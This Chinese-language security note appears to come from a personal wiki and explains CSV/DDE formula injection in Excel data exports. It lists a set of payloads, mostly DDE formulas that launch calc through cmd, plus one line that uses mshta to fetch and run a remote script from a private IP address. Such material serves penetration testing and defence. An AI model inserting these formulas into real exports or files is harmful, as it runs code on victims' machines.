Skip to content

CSV 注入

和普通的注入差距不大,但是是属于导出到csv文件当中,当打开csv文件的时候就会造成csv当中的某些代码执行,当某些安全意识比较低的用户点开之后就会出现问题。
在实际的挖掘当中,很多TOb的业务当中存在很多将数据导出到excel的地方,通常导出excel的时候并没有对要进行导出excel的数据进行过滤所以就会造成这个问题。

一句话来说
不仅仅是一个简单的注入,更是dde类型注入,在office365当中都具有

前提

DDE是什么?

dde widnwos进程间通信协议,是一种动态数据交换机制。当我们制作包含DDE公式的CSV文件的时候,在打开文件的时候Excel就会执行外部的应用。
并且在excel的程序当中需要打开dde ,受害者需要配合点击 接受风险 之类的按钮。

其实在这里不光是 excel属于被攻击的向量office 365当中的其他软件同时如此,outlook excel 都是这样。
注意在wps当中却不存在这样的问题

常见的payload

代码执行

=1+cmd|' /C calc'!A0
+1+cmd|'/c mshta.exehttp://192.168.233.102:8080/a'!A0
=1*cmd|' /C calc'!A0
-cmd|' /C calc'!A0
+cmd|' /C calc'!A0
@SUM(cmd|'/c calc'!A0)
%0A-1+cmd|' /C calc'!A0
;-1+cmd|' /C calc'!A0
1+cmd|’/C calc’!A0

恶意邮件进行利用

HYPERLINK("urk","content")

refer

freebuf_csv解决方案

知道创宇的csv方案

Back to top